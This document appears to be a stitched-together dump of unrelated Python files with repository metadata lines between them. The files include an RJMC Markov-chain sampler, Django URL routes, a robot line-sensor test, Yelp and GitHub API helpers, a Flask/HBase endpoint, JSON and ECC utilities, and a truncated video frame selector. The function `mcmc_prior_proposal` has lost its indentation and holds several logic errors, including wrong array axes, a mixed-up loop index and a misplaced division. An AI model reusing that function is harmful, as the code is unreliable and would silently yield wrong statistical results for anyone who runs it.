    # Initialize trace for parameters
    trace = np.zeros((n_iterations+1, n_params)) #n_iterations + 1 to account for guess
    logp_trace = np.zeros(n_iterations+1)
    # Set initial values
    trace[0] = initial_values
    # Calculate joint posterior for initial values
    current_log_prob = calc_posterior(*trace[0])
    logp_trace[0] = current_log_prob
    current_params=trace[0].copy()
    # Acceptance statistics are only recorded after the tuning phase; note the
    # string-valued 'True'/'False' flag convention used throughout this module.
    record_acceptance='False'
    #----------------------------------------------------------------------------------------#
    #OUTER MCMC LOOP
    for i in range(n_iterations):
        if not i%5000: print('Iteration '+str(i))

        # Grab current parameter values
        current_params = trace[i].copy()
        current_model = int(current_params[0])
        current_log_prob = logp_trace[i].copy()

        if i >= tune_for:
            record_acceptance='True'

        new_params, new_log_prob, attempt_matrix,acceptance_matrix,acceptance = RJMC_Moves(current_params,current_model,current_log_prob,n_models,swap_freq,n_params,prop_sd,attempt_matrix,acceptance_matrix,jacobian,transition_function,record_acceptance,AUA_opt_params,AUA_Q_opt_params)

        if acceptance == 'True':
            accept_vector[i]=1
        logp_trace[i+1] = new_log_prob
        trace[i+1] = new_params

        # Periodically rescale the proposal widths toward a 20-50% acceptance rate.
        if (not (i+1) % tune_freq) and (i < tune_for):
            print('Tuning on step %1.1i' %i)
            #print(np.sum(accept_vector[i-tune_freq:]))
            acceptance_rate = np.sum(accept_vector)/i
            print(acceptance_rate)
            for m in range (n_params-1):
                if acceptance_rate<0.2:
                    prop_sd[m+1] *= 0.9
                    print('Yes')
                elif acceptance_rate>0.5:
                    prop_sd[m+1] *= 1.1
                    print('No')

    return trace,logp_trace, attempt_matrix,acceptance_matrix,prop_sd,accept_vector
def RJMC_Moves(current_params,current_model,current_log_prob,n_models,swap_freq,n_params,prop_sd,attempt_matrix,acceptance_matrix,jacobian,transition_function,record_acceptance,AUA_opt_params,AUA_Q_opt_params):
    """Perform one RJMC step: with probability swap_freq attempt a
    trans-dimensional model swap, otherwise a within-model parameter move.

    Returns (new_params, new_log_prob, attempt_matrix, acceptance_matrix,
    acceptance) where acceptance is the string 'True' or 'False'.
    """
    params = current_params.copy()# This approach updates previous param values
    #Grab a copy of the current params to work with
    #current_log_prob_copy=copy.deepcopy(current_log_prob)

    #Roll a dice to decide what kind of move will be suggested
    mov_ran=np.random.random()

    if mov_ran <= swap_freq:
        # Trans-dimensional model-swap move; the acceptance ratio includes the
        # RJMC Jacobian and the proposal transition function.
        #mu=0.015

        params,rjmc_jacobian,proposed_log_prob,proposed_model,w,lamda,transition_function=model_proposal(current_model,n_models,n_params,params,jacobian,transition_function,AUA_opt_params,AUA_Q_opt_params)

        alpha = (proposed_log_prob - current_log_prob) + np.log(rjmc_jacobian) + np.log(transition_function)

        acceptance=accept_reject(alpha)

        if acceptance =='True':
            new_log_prob=proposed_log_prob
            new_params=params
            if record_acceptance == 'True':
                acceptance_matrix[current_model,proposed_model]+=1
                attempt_matrix[current_model,proposed_model]+=1
        elif acceptance == 'False':
            new_params=current_params
            new_log_prob=current_log_prob
            if record_acceptance == 'True':
                attempt_matrix[current_model,proposed_model]+=1
        '''
        move_type = 'Swap'
    else:
        move_type = 'Trad'

    if move_type == 'Swap':
        '''
    else:
        # Conventional within-model random-walk perturbation of one parameter.
        params,proposed_log_prob=parameter_proposal(params,n_params,prop_sd)

        alpha = (proposed_log_prob - current_log_prob)

        acceptance=accept_reject(alpha)

        if acceptance =='True':
            new_log_prob=proposed_log_prob
            new_params=params
            if record_acceptance == 'True':
                acceptance_matrix[current_model,current_model]+=1
                attempt_matrix[current_model,current_model]+=1
        elif acceptance == 'False':
            new_params=current_params
            new_log_prob=current_log_prob
            if record_acceptance == 'True':
                attempt_matrix[current_model,current_model]+=1

    return new_params,new_log_prob,attempt_matrix,acceptance_matrix,acceptance
def accept_reject(alpha):
    """Metropolis accept/reject test.

    Accepts with probability min(1, exp(alpha)) by comparing the log of a
    uniform(0, 1) draw against the log acceptance ratio alpha. Returns the
    string 'True' or 'False' (the flag convention used by this module).
    """
    if np.log(np.random.rand()) < alpha:
        return 'True'
    return 'False'
def model_proposal(current_model,n_models,n_params,params,jacobian,transition_function,AUA_opt_params,AUA_Q_opt_params):
    """Propose a jump to a different model, remapping the parameters between
    the AUA (model 0) and AUA+Q (model 1) optima and drawing/collapsing the
    auxiliary Q parameter (params[3]) via an exponential bridge.

    NOTE(review): relies on a module-level calc_posterior, which is commented
    out in this file — confirm it is defined/imported by the calling script.
    """
    proposed_model=current_model

    # Draw a different model uniformly at random.
    while proposed_model==current_model:
        proposed_model=int(np.floor(np.random.random()*n_models))

    # Rate of the exponential used to propose/collapse params[3].
    lamda=2
    params[0] = proposed_model
    if proposed_model==1:
        # Rescale eps/sigma from the AUA optimum onto the AUA+Q optimum.
        params[1] = (AUA_Q_opt_params[0]/AUA_opt_params[0])*params[1]
        params[2] = (AUA_Q_opt_params[1]/AUA_opt_params[1])*params[2]
        w=runif()

        #THIS IS IMPORTANT needs to be different depending on which direction

        # Inverse-CDF draw of Q from an exponential(lamda) distribution.
        params[3] = -(1/lamda)*np.log(w)
    if proposed_model==0:
        # Rescale eps/sigma back onto the AUA optimum and collapse Q.
        params[1] = (AUA_opt_params[0]/AUA_Q_opt_params[0])*params[1]
        params[2] = (AUA_opt_params[1]/AUA_Q_opt_params[1])*params[2]
        # Recover the uniform variate corresponding to the current Q value.
        w=np.exp(-lamda*params[3])
        params[3]=0

    proposed_log_prob=calc_posterior(*params)
    # Evaluate the Jacobian/transition factors for this (current -> proposed) jump.
    jacobian = jacobian(n_models,n_params,w,lamda,AUA_opt_params,AUA_Q_opt_params)
    rjmc_jacobian=jacobian[current_model,proposed_model]
    transition_function=transition_function(n_models,w)
    transition_function=transition_function[current_model,proposed_model]
    return params,rjmc_jacobian,proposed_log_prob,proposed_model,w,lamda,transition_function
def parameter_proposal(params,n_params,prop_sd):
    """Random-walk proposal for a single continuous parameter.

    Picks one of indices 1..n_params-1 (index 0 is the model number) and
    perturbs it with a normal step of width prop_sd. Q (params[3]) is forced
    to zero when the current model is 0 (AUA, no quadrupole).

    NOTE(review): relies on a module-level calc_posterior, which is commented
    out in this file — confirm it is defined/imported by the calling script.
    """
    proposed_param=int(np.ceil(np.random.random()*(n_params-1)))

    params[proposed_param] = rnorm(params[proposed_param], prop_sd[proposed_param])
    proposed_log_prob=calc_posterior(*params)
    if params[0]==0:
        params[3]=0

    return params, proposed_log_prob
def mcmc_prior_proposal(n_models,calc_posterior,guess_params,guess_sd):
swap_freq=0.0
n_iter=50000
tune_freq=100
tune_for=10000
for i in range(n_models):
initial_values=guess_params[i,:]
initial_sd=guess_sd[i,:]
trace,logp_trace,attempt_matrix,acceptance_matrix,prop_sd,accept_vector = RJMC_outerloop(calc_posterior,n_iter,initial_values,initial_sd,n_models,swap_freq,tune_freq,tune_for,1,1,1,1)
trace_tuned = trace[tune_for:]
max_ap=np.empty(np.size(trace_tuned,1))
map_CI=np.zeros((np.size(trace_tuned,1),2))
parameter_prior_proposal=np.empty((n_models,np.size(trace_tuned,1),2))
for j in range(np.size(trace_tuned,2)):
bins,values=np.histogram(trace_tuned[:,j],bins=100)
max_ap[j]=(values[np.argmax(bins)+1]+values[np.argmax(bins)])/2
map_CI[j]=hpd(trace_tuned[:,i],alpha=0.05)
sigma_hat=map_CI[j,1]-map_CI[j,0]/(2*1.96)
parameter_prior_proposal[j,i]=[max_ap,sigma_hat*1.5]
support=np.linspace(np.min(trace_tuned[:,j]),np.max(trace_tuned[:,j]),100)
plt.hist(trace_tuned[:,j],density=True)
plt.plot(support,norm(support,*parameter_prior_proposal))
return parameter_prior_proposal | 2.234375 | 2 |
users/urls.py | yileye/OpenSA | 280 | 12762462 | #!/usr/bin/env python
# ~*~ coding: utf-8 ~*~
from __future__ import absolute_import
from django.urls import path
from users.views import login, users, groups, project, permission,role,keys
# Namespace used when reversing these URLs (e.g. 'users:login').
app_name = 'users'
urlpatterns = [
    # Authentication views (login/logout)
    path('login/', login.UserLoginView.as_view(), name='login'),
    path('logout/', login.UserLogoutView.as_view(), name='logout'),
    # User management views (list/add/update/bulk-delete/password/detail)
    path('users-list/', users.UsersListAll.as_view(), name='users_list'),
    path('users-add/', users.UsersAdd.as_view(), name='users_add'),
    path('users-update/<int:pk>/', users.UsersUpdate.as_view(), name='users_update'),
    path('users-all-del/', users.UsersAllDel.as_view(), name='users_all_del'),
    path('users-change-password/', users.UsersChangePassword.as_view(), name='users_change_password'),
    path('users-detail/<int:pk>/', users.UsersDetail.as_view(), name='users_detail'),
    # Department / group management views
    path('groups-list/', groups.GroupsListAll.as_view(), name='groups_list'),
    path('groups-add/', groups.GroupsAdd.as_view(), name='groups_add'),
    path('groups-update/<int:pk>/', groups.GroupsUpdate.as_view(), name='groups_update'),
    path('groups-all-del/', groups.GroupsAllDel.as_view(), name='groups_all_del'),
    # Project management views
    path('project-list/', project.ProjectListAll.as_view(), name='project_list'),
    path('project-add/', project.ProjectAdd.as_view(), name='project_add'),
    path('project-update/<int:pk>/', project.ProjectUpdate.as_view(), name='project_update'),
    path('project-all-del/', project.ProjectDel.as_view(), name='project_all_del'),
    # SSH key management views (note: key PKs are UUIDs, not ints)
    path('key-list/', keys.KeyListAll.as_view(), name='key_list'),
    path('key-add/', keys.KeyAdd.as_view(), name='key_add'),
    path('key-update/<uuid:pk>/', keys.KeyUpdate.as_view(), name='key_update'),
    path('key-all-del/', keys.KeyAllDel.as_view(), name='key_all_del'),
    # Permission management views
    path('permission-list/', permission.PermissionListAll.as_view(), name='permission_list'),
    path('permission-add/', permission.PermissionAdd.as_view(), name='permission_add'),
    path('permission-update/<int:pk>/', permission.PermissionUpdate.as_view(), name='permission_update'),
    path('permission-all-del/', permission.PermissionAllDel.as_view(), name='permission_all_del'),
    # Role management views
    path('role-list/', role.RoleAll.as_view(), name='role_list'),
    path('role-edit/<int:pk>/', role.RoleEdit.as_view(), name='role_edit'),
    path('role-all-del/', role.RoleAllDel.as_view(), name='role_all_del'),
]
python_library/examples/linearray_test.py | shurik179/yozh | 1 | 12762463 | <reponame>shurik179/yozh
# Testing reflectance array
import time
import yozh
# RGB color triples for the robot's LEDs.
RED=[255,0,0]
GREEN=[0,255,0]
BLUE=[0,0,255]
bot = yozh.Yozh()
# initialize display: three text areas (status line plus two data lines)
bot.clear_display()
line1=bot.add_textbox(text_wrap=23, line_spacing=1.0)
line2=bot.add_textbox(text_position=(0,25))
line3=bot.add_textbox(text_position=(0,45))
bot.set_text("Yozh initialized!", line1)
time.sleep(1.0)
# show basic info: firmware version and battery voltage
bot.set_text("FW version: "+ bot.fw_version(), line1)
voltage = bot.battery()
bot.set_text("Voltage: {}".format(voltage), line2)
# set both LEDs to Blue
bot.set_leds(BLUE)
# turn on line reflectance sensors
bot.linearray_on()
# buzz at frequency 440Hz for 1 sec
bot.buzz(440,1.0)
# wait for 3 sec
time.sleep(3.0)
bot.set_text(" ", line2)
# Calibration requires the robot to straddle a black line so the sensors
# see both extremes; the user confirms placement with button A.
bot.set_text("Place robot partly on black and press button A to calibrate", line1)
bot.wait_for(bot.button_A)
bot.set_leds(RED)
bot.calibrate()
bot.set_leds(BLUE)
bot.set_text("Calibration complete", line1)
time.sleep(2.0)
# Main loop: continuously display raw/calibrated readings of all 8
# reflectance sensors and the computed line position.
while True:
    # print raw values
    raw_values = ""
    for i in range(8):
        raw_values+=str(bot.linearray_raw(i))+"; "
    bot.set_text(raw_values, line1)
    # print calibrated values
    cal_values=""
    for i in range(8):
        cal_values+=str(round(bot.linearray_cal(i)))+";"
    bot.set_text(cal_values,line2)
    # print line position; sign indicates which side of centre the line is on
    x = round(bot.line_position_white(),1)
    bot.set_text("Line: {}".format(x), line3)
    if x>0:
        bot.set_leds(RED, GREEN)
    else:
        bot.set_leds(GREEN, RED)
    time.sleep(0.3)
| 2.6875 | 3 |
testing/business_lookup_responses.py | ricwillis98/yelp-python | 195 | 12762464 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import responses
from testing.util import read_json_file
# Canned 200 response for the business-lookup endpoint, keyed by business
# alias "yelp-san-francisco"; payload loaded from a JSON fixture.
YELP_SAN_FRANCISCO = responses.Response(
    method="GET",
    url="https://api.yelp.com/v3/businesses/yelp-san-francisco",
    json=read_json_file("business_lookup_yelp_san_francisco.json"),
    status=200,
)
# Same, for a business alias containing non-ASCII characters (exercises
# URL encoding of unicode aliases).
SACRE_COEUR_PARIS = responses.Response(
    method="GET",
    url="https://api.yelp.com/v3/businesses/basilique-du-sacré-cœur-de-montmartre-paris-3",  # noqa: E501
    json=read_json_file("business_lookup_sacre_coeur_paris.json"),
    status=200,
)
| 2.21875 | 2 |
github/methods/activity/starring/list_repository_stargazers.py | appheap/PyGithub | 1 | 12762465 | <reponame>appheap/PyGithub<filename>github/methods/activity/starring/list_repository_stargazers.py<gh_stars>1-10
from github.scaffold import Scaffold
from github.types import Response
from github.utils import utils
class ListRepositoryStargazers(Scaffold):
    """
    List the users who have starred a repository.
    """

    def list_repository_stargazers(
            self,
            *,
            owner: str,
            repo: str,
            per_page: int = 100,
            page: int = 1,
    ) -> 'Response':
        """
        Lists the people that have starred the repository.

        :param owner: Username of the account that owns the repository
        :param repo: Name of the repository
        :param per_page:
            Results per page (max "100")
            Default: "30"
        :param page:
            Page number of the results to fetch.
            Default: "1"
        :return: 'Response'
        """

        # The "star+json" media type additionally returns the timestamp at
        # which each star was created.
        response = self.get_with_token(
            url=f'https://api.github.com/repos/{owner}/{repo}/stargazers',
            params={
                'per_page': per_page,
                'page': page,
            },
            headers={
                'Accept': 'application/vnd.github.v3.star+json',
            }
        )
        if response.status_code == 200:
            return Response._parse(
                response=response,
                success=True,
                result=utils.parse_stargazers(response.json()),
            )
        # Any non-200 status (e.g. 404 not found, 422 validation failure) is
        # reported as an unsuccessful Response; the original code had two
        # byte-identical branches for 422 and everything else.
        return Response._parse(
            response=response,
            success=False,
        )
| 2.546875 | 3 |
cdc-hbase-c360/c360_flask.py | jerroldlaw/apac-workshops | 8 | 12762466 | from flask import Flask, render_template, request
import json
from thrift import Thrift
from thrift.transport import TSocket,TTransport
from thrift.protocol import TBinaryProtocol
from hbase import Hbase
from hbase.ttypes import ColumnDescriptor,Mutation,BatchMutation,TRegionInfo
from hbase.ttypes import IOError,AlreadyExists
app = Flask(__name__)
@app.route('/getallcustomers')
def getallcustomers():
    """Return all customer rows from the C360_STREAM HBase table as JSON.

    Opens a Thrift connection to HBase, scans the table until the scanner
    is exhausted, and serialises the selected columns of each row.
    """
    socket = TSocket.TSocket('hbase', 9090)
    socket.setTimeout(5000)
    transport = TTransport.TBufferedTransport(socket)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = Hbase.Client(protocol)
    transport.open()
    customers = []
    scan_id = client.scannerOpen("C360_STREAM", "", [])
    try:
        # BUG FIX: the original fetched a single batch of 10 rows only;
        # keep fetching until the scanner is exhausted so *all* customers
        # are returned, as the endpoint name promises.
        while True:
            rows = client.scannerGetList(scan_id, 100)
            if not rows:
                break
            for row in rows:
                customer = {
                    "CUSTOMER_ID": row.row,
                    "FIRST_NAME": row.columns.get('C360_STREAM:FIRST_NAME').value,
                    "LAST_NAME": row.columns.get('C360_STREAM:LAST_NAME').value,
                    "PHONE_TYPE": row.columns.get('C360_STREAM:PHONE_TYPE').value,
                    "ADDRESS_LINE_1": row.columns.get('C360_STREAM:ADDRESS_LINE_1').value,
                    "ADDRESS_LINE_2": row.columns.get('C360_STREAM:ADDRESS_LINE_2').value,
                    "ADDRESS_TYPE": row.columns.get('C360_STREAM:ADDRESS_TYPE').value,
                }
                customers.append(customer)
    finally:
        # BUG FIX: the scanner was never closed and the transport leaked
        # when an exception occurred; release both server-side and
        # client-side resources.
        client.scannerClose(scan_id)
        transport.close()
    return json.dumps(customers)
if __name__ == '__main__':
    # debug=True enables the interactive Werkzeug debugger and auto-reload;
    # never enable it on a production deployment.
    app.run(debug = True)
| 2.1875 | 2 |
playground/util.py | murlokito/playground | 0 | 12762467 | __title__ = "playground"
__author__ = "murlux"
__copyright__ = "Copyright 2019, " + __author__
__credits__ = (__author__, )
__license__ = "MIT"
__email__ = "<EMAIL>"
import json
import logging
from typing import Any, Dict, Optional
from dateutil.relativedelta import relativedelta
from datetime import datetime
from jsonschema import validate, exceptions
from playground import enums
def timestamp_to_date(timestamp=None):
    """Convert a Unix timestamp (seconds) into a naive local ``datetime``.

    Accepts anything ``int()`` can coerce (int, float, numeric string).
    """
    seconds = int(timestamp)
    return datetime.fromtimestamp(seconds)
def setup_logger(name: str = None) -> logging.Logger:
    """Return the logger named *name*, ensuring root logging is configured.

    ``logging.basicConfig`` is a no-op once the root logger already has
    handlers, so calling this repeatedly is safe.
    """
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    )
    return logging.getLogger(name)
class ArgumentDebugger:
    """Helpers for inspecting keyword arguments passed into a function."""

    @staticmethod
    def print_kwargs(**kwargs):
        """Print the raw kwargs dict as-is."""
        print(kwargs)

    @staticmethod
    def print_values(**kwargs):
        """Print each keyword argument on its own line."""
        for key in kwargs:
            print("The value of {} is {}".format(key, kwargs[key]))
def validateJSONString(json_string: str = None) -> Optional[Dict[str, Any]]:
    """Parse *json_string* and return the decoded object.

    Returns None (after logging) when the string is not valid JSON.

    :raises Exception: when no string is supplied at all.
    """
    logger: logging.Logger = setup_logger(name='JSONStringValidator')
    if json_string is None:
        raise Exception('JSONStringValidator expects `json_string` param to not be None')
    try:
        return json.loads(json_string)
    except ValueError as err:
        logger.error('Invalid json provided. exc:', exc_info=err)
        return None
def validateJSONFile(filename: str = None) -> Optional[Dict[str, Any]]:
    """Read *filename* and return its parsed JSON content.

    Returns None (after logging) when the file cannot be read or does not
    contain valid JSON.

    :raises Exception: when no filename is supplied at all.
    """
    logger: logging.Logger = setup_logger(name='JSONFileValidator')
    if filename is None:
        raise Exception('JSONFileValidator expects `filename` param to not be None')
    try:
        with open(file=filename, mode='r') as file:
            return validateJSONString(json_string=file.read())
    except IOError as io_exc:
        logger.error('I/O Error occurred. exc:', exc_info=io_exc)
    except FileNotFoundError as fnf_exc:
        logger.error('File not found. exc:', exc_info=fnf_exc)
    except OSError as os_exc:
        logger.error('System error occurred. exc:', exc_info=os_exc)
def validateJSONSchema(filename: str = None, schema_file: str = None) -> Optional[Dict[str, Any]]:
    """
    Reads a file and validates that its content is JSON conforming to the
    schema loaded from *schema_file*.

    :param filename: path of the JSON document to validate
    :param schema_file: path of the JSON-schema file to validate against
    :return: the parsed JSON data when valid, None when schema validation fails
    :raises Exception: when *filename* is missing or the schema cannot be loaded
    """
    logger: logging.Logger = setup_logger(name='JSONSchemaValidator')

    def _load_json_schema(schema_filename: str = None) -> Optional[Dict[str, Any]]:
        """Load and parse the schema file, returning None on any I/O error."""
        try:
            # BUG FIX: the original bound the open file object to
            # `schema_file`, shadowing the outer parameter of the same name.
            with open(schema_filename) as fp:
                return json.loads(fp.read())
        except IOError as io_exc:
            logger.error('I/O Error occurred. exc:', exc_info=io_exc)
        except FileNotFoundError as fnf_exc:
            logger.error('File not found. exc:', exc_info=fnf_exc)
        except OSError as os_exc:
            logger.error('System error occurred. exc:', exc_info=os_exc)

    if filename is None:
        raise Exception('JSONSchemaValidator expects `filename` param to not be None')
    data = validateJSONFile(filename=filename)
    schema = _load_json_schema(schema_filename=schema_file)
    if schema is None:
        raise Exception('JSONSchemaValidator expects schema file to be valid')
    try:
        validate(data, schema)
    except exceptions.ValidationError as ex:
        # Previously swallowed silently; surface the failure in the log
        # before returning None.
        logger.error('Schema validation failed. exc:', exc_info=ex)
        return None
    return data
| 2.515625 | 3 |
psi/serialize/ecc.py | delta-mpc/python-psi | 35 | 12762468 | <reponame>delta-mpc/python-psi<filename>psi/serialize/ecc.py
from Crypto.PublicKey import ECC
__all__ = ["point_to_bytes", "key_to_bytes", "bytes_to_key"]
def point_to_bytes(point: ECC.EccPoint):
    """Serialize an EC point as its x-coordinate bytes followed by a parity
    byte (0x02 for even y, 0x03 for odd y).

    NOTE(review): standard SEC1 compressed encoding places the 0x02/0x03
    prefix BEFORE the x-coordinate; here it is appended after. Confirm the
    peer deserializer expects this custom layout.
    """
    xs = point.x.to_bytes()
    # 2 + is_odd() yields 2 for even y, 3 for odd y.
    ys = bytes([2 + point.y.is_odd()])
    return xs + ys
def key_to_bytes(key: ECC.EccKey):
    """Export a *public* ECC key as compressed DER bytes for transmission.

    :raises ValueError: if *key* contains a private component -- private
        keys must never be sent to the other party.
    """
    if key.has_private():
        raise ValueError("only public key can be serialized to bytes to send")
    return key.export_key(format="DER", compress=True)
def bytes_to_key(data: bytes) -> ECC.EccKey:
    """Reconstruct an ECC public key from DER bytes produced by key_to_bytes."""
    return ECC.import_key(data)
| 2.671875 | 3 |
src/vfs/process.py | waikato-datamining/video-frame-selector | 0 | 12762469 | <gh_stars>0
import argparse
import cv2
import os
import traceback
from datetime import datetime
from time import sleep
from yaml import safe_dump
from vfs.common import INPUT_IMAGE_DIR, INPUT_VIDEO, INPUT_WEBCAM, INPUT_TYPES, ANALYSIS_ROISCSV, ANALYSIS_OPEXJSON, \
ANALYSIS_TYPES, OUTPUT_JPG, OUTPUT_MJPG, OUTPUT_TYPES, ANALYSIS_FORMAT, list_images
from vfs.predictions import crop_frame, check_predictions, load_roiscsv, load_opexjson
from vfs.logging import log
def cleanup_file(path):
    """
    Removes the file if present; a missing file is a silent no-op.

    :param path: the file to remove
    :type path: str
    """
    if not os.path.exists(path):
        return
    os.remove(path)
def load_output(analysis_file, analysis_type, metadata):
    """
    Loads the generated analysis output file and returns the predictions.

    :param analysis_file: the file to check
    :type analysis_file: str
    :param analysis_type: the type of analysis, see ANALYSIS_TYPES
    :type analysis_type: str
    :param metadata: for attaching metadata
    :type metadata: dict
    :return: list of Prediction objects
    :rtype: list
    """
    # Dispatch to the loader matching the analysis output format.
    loaders = {
        ANALYSIS_ROISCSV: load_roiscsv,
        ANALYSIS_OPEXJSON: load_opexjson,
    }
    if analysis_type not in loaders:
        raise Exception("Unhandled analysis type: %s" % analysis_type)
    predictions = loaders[analysis_type](analysis_file)
    metadata["num_predictions"] = len(predictions)
    return predictions
def process_image(frame, frameno, analysis_input, analysis_output, analysis_tmp,
                  analysis_timeout, analysis_type, analysis_keep_files,
                  min_score, required_labels, excluded_labels, poll_interval,
                  crop_to_content, crop_margin, crop_min_width, crop_min_height,
                  verbose):
    """
    Pushes a frame through the image analysis framework and returns whether to keep it or not.

    :param frame: the frame to check
    :type frame: ndarray
    :param frameno: the current frame no
    :type frameno: int
    :param analysis_input: the input directory of the image analysis process
    :type analysis_input: str
    :param analysis_output: the output directory of the image analysis process
    :type analysis_output: str
    :param analysis_tmp: the tmp directory to write the image to before moving it into the image analysis input dir
    :type analysis_tmp: str or None
    :param analysis_timeout: the number of seconds to wait for analysis to finish before skipping frame
    :type analysis_timeout: float
    :param analysis_type: the type of output the analysis is generated, see ANALYSIS_TYPES
    :type analysis_type: str
    :param analysis_keep_files: whether to keep the analysis files rather than deleting them
    :type analysis_keep_files: bool
    :param min_score: the minimum score that the predictions have to have
    :type min_score: float
    :param required_labels: the list of labels that must have the specified min_score, ignored if None or empty
    :type required_labels: list or None
    :param excluded_labels: the list of labels that must not have the specified min_score, ignored if None or empty
    :type excluded_labels: list or None
    :param poll_interval: the interval in seconds for the file polling
    :type poll_interval: float
    :param crop_to_content: whether to crop the frame to the content (eg bounding boxes)
    :type crop_to_content: bool
    :param crop_margin: the margin to use around the cropped content
    :type crop_margin: int
    :param crop_min_width: the minimum width for the cropped content
    :type crop_min_width: int
    :param crop_min_height: the minimum height for the cropped content
    :type crop_min_height: int
    :param verbose: whether to print some logging information
    :type verbose: bool
    :return: tuple (whether to keep the frame or skip it, potentially cropped frame, metadata dict)
    :rtype: tuple
    """
    # Write the frame where the analysis process will pick it up; going via
    # a tmp dir + rename avoids the analysis process reading a half-written
    # file (rename is atomic on the same filesystem).
    if analysis_tmp is not None:
        img_tmp_file = os.path.join(analysis_tmp, (ANALYSIS_FORMAT % frameno).replace(".EXT", ".jpg"))
        img_in_file = os.path.join(analysis_input, (ANALYSIS_FORMAT % frameno).replace(".EXT", ".jpg"))
        if verbose:
            log("Writing image: %s" % img_tmp_file)
        cv2.imwrite(img_tmp_file, frame)
        if verbose:
            log("Renaming image to: %s" % img_in_file)
        os.rename(img_tmp_file, img_in_file)
    else:
        img_in_file = os.path.join(analysis_input, (ANALYSIS_FORMAT % frameno).replace(".EXT", ".jpg"))
        if verbose:
            log("Writing image: %s" % img_in_file)
        cv2.imwrite(img_in_file, frame)

    img_out_file = os.path.join(analysis_output, (ANALYSIS_FORMAT % frameno).replace(".EXT", ".jpg"))
    # Candidate result file names the analysis process may produce.
    if analysis_type == ANALYSIS_ROISCSV:
        name1 = (ANALYSIS_FORMAT % frameno).replace(".EXT", "-rois.csv")
        name2 = (ANALYSIS_FORMAT % frameno).replace(".EXT", ".csv")
        out_files = [os.path.join(analysis_output, name1), os.path.join(analysis_output, name2)]
    elif analysis_type == ANALYSIS_OPEXJSON:
        name1 = (ANALYSIS_FORMAT % frameno).replace(".EXT", ".json")
        out_files = [os.path.join(analysis_output, name1)]
    else:
        raise Exception("Unhandled analysis type: %s" % analysis_type)

    metadata = dict()

    # pass through image analysis
    # BUG FIX: the original compared datetime.now().microsecond (which wraps
    # back to 0 every second) against an offset scaled by 10e6 (= 1e7, i.e.
    # ten million "microseconds" per second), so the timeout never worked as
    # documented; use absolute epoch seconds instead.
    end = datetime.now().timestamp() + analysis_timeout
    while datetime.now().timestamp() < end:
        for out_file in out_files:
            if os.path.exists(out_file):
                if verbose:
                    log("Checking analysis output: %s" % out_file)
                predictions = load_output(out_file, analysis_type, metadata)
                result = check_predictions(predictions, min_score, required_labels, excluded_labels, verbose)
                if not analysis_keep_files:
                    os.remove(out_file)
                if verbose:
                    log("Can be included: %s" % str(result))
                if result:
                    if crop_to_content:
                        frame = crop_frame(frame, predictions, metadata,
                                           margin=crop_margin, min_width=crop_min_width, min_height=crop_min_height,
                                           verbose=verbose)
                    cleanup_file(img_in_file)
                    cleanup_file(img_out_file)
                    return result, frame, metadata
        sleep(poll_interval)

    # timed out without a positive result: clean up if necessary
    cleanup_file(img_in_file)
    cleanup_file(img_out_file)
    return False, frame, metadata
def process(input, input_type, nth_frame, max_frames, analysis_input, analysis_output, analysis_tmp,
            analysis_timeout, analysis_type, analysis_keep_files, from_frame, to_frame,
            min_score, required_labels, excluded_labels, poll_interval,
            output, output_type, output_format, output_tmp, output_fps, output_metadata,
            crop_to_content, crop_margin, crop_min_width, crop_min_height,
            verbose, progress, keep_original):
    """
    Processes the input video or webcam feed.

    :param input: the input dir, video or webcam ID
    :type input: str
    :param input_type: the type of input, INPUT_TYPES
    :type input_type: str
    :param nth_frame: for frame skipping to speed up processing
    :type nth_frame: int
    :param max_frames: the maximum number of processed frames before exiting (<=0 for unlimited)
    :type max_frames: int
    :param analysis_input: the input directory of the image analysis process
    :type analysis_input: str or None
    :param analysis_output: the output directory of the image analysis process
    :type analysis_output: str or None
    :param analysis_tmp: the tmp directory to write the image to before moving it into the image analysis input dir
    :type analysis_tmp: str or None
    :param analysis_timeout: the number of seconds to wait for analysis to finish before skipping frame
    :type analysis_timeout: float
    :param analysis_type: the type of output the analysis is generated, see ANALYSIS_TYPES
    :type analysis_type: str
    :param analysis_keep_files: whether to keep the analysis files rather than deleting them
    :type analysis_keep_files: bool
    :param from_frame: the starting frame (incl), ignored if <=0
    :type from_frame: int
    :param to_frame: the last frame (incl), ignored if <=0
    :type to_frame: int
    :param min_score: the minimum score that the predictions have to have
    :type min_score: float
    :param required_labels: the list of labels that must have the specified min_score, ignored if None or empty
    :type required_labels: list
    :param excluded_labels: the list of labels that must not have the specified min_score, ignored if None or empty
    :type excluded_labels: list
    :param poll_interval: the interval in seconds for the file polling
    :type poll_interval: float
    :param output: the output video oor directory for output images
    :type output: str
    :param output_type: the type of output to generate, see OUTPUT_TYPES
    :type output_type: str
    :param output_format: the file name format to use for the image files
    :type output_format: str
    :param output_tmp: the tmp directory to write the output images to before moving them to the output directory
    :type output_tmp: str
    :param output_fps: the frames-per-second to use when generating an output video
    :type output_fps: int
    :param output_metadata: whether to output metadata as YAML file alongside JPG frames
    :type output_metadata: bool
    :param crop_to_content: whether to crop the frame to the content (eg bounding boxes)
    :type crop_to_content: bool
    :param crop_margin: the margin to use around the cropped content
    :type crop_margin: int
    :param crop_min_width: the minimum width for the cropped content
    :type crop_min_width: int
    :param crop_min_height: the minimum height for the cropped content
    :type crop_min_height: int
    :param verbose: whether to print some logging information
    :type verbose: bool
    :param progress: in verbose mode, outputs a progress line every x frames with how many frames have been processed
    :type progress: int
    :param keep_original: whether to keep the original filename when processing an image dir
    :type keep_original: bool
    """
    # open input: either a list of image files or an OpenCV capture device
    if input_type not in INPUT_TYPES:
        raise Exception("Unknown input type: %s" % input_type)
    cap = None
    files = None
    if input_type == INPUT_IMAGE_DIR:
        files = list_images(input, verbose=verbose)
    elif input_type == INPUT_VIDEO:
        if verbose:
            log("Opening input video: %s" % input)
        cap = cv2.VideoCapture(input)
    elif input_type == INPUT_WEBCAM:
        if verbose:
            log("Opening webcam: %s" % input)
        cap = cv2.VideoCapture(int(input))
    else:
        raise Exception("Unhandled input type: %s" % input_type)
    # frames: sanity-check the requested frame window
    if (from_frame > 0) and (to_frame > 0):
        if from_frame > to_frame:
            raise Exception("from_frame (%d) cannot be larger than to_frame (%d)" % (from_frame, to_frame))
    # analysis: input and output dirs must be supplied together or not at all
    if analysis_type not in ANALYSIS_TYPES:
        raise Exception("Unknown analysis type: %s" % analysis_type)
